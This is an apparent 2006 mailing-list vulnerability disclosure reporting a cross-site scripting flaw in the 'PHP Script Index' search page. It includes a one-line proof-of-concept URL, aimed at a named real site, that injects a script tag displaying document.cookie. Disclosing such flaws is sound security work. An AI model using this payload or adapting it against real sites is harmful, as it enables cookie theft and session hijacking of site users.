From: predej deja <m4ilinglists@gmail.com>
To: cert@cert.org, osvdb <moderators@osvdb.org>, secunia <vuln@secunia.com>, securityfocus <listadmin@securityfocus.com>
Date: Tue, 28 Mar 2006 18:21:43 +0200
Subject: [OSVDB Mods] PHP Script Index - Cross Site Scripting

PHP Script Index - Cross Site Scripting

Vendor URL: http://www.nukedweb.com/phpscripts/

Description:

The search app does not properly validate user input..
which allows people to inject dangerous html code..

PoC:

http://www.phpmaniacs.com/scripts/search.php?search=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&submit=Go%21



Preddy
RootShell Security Group
www.rootshell-security.net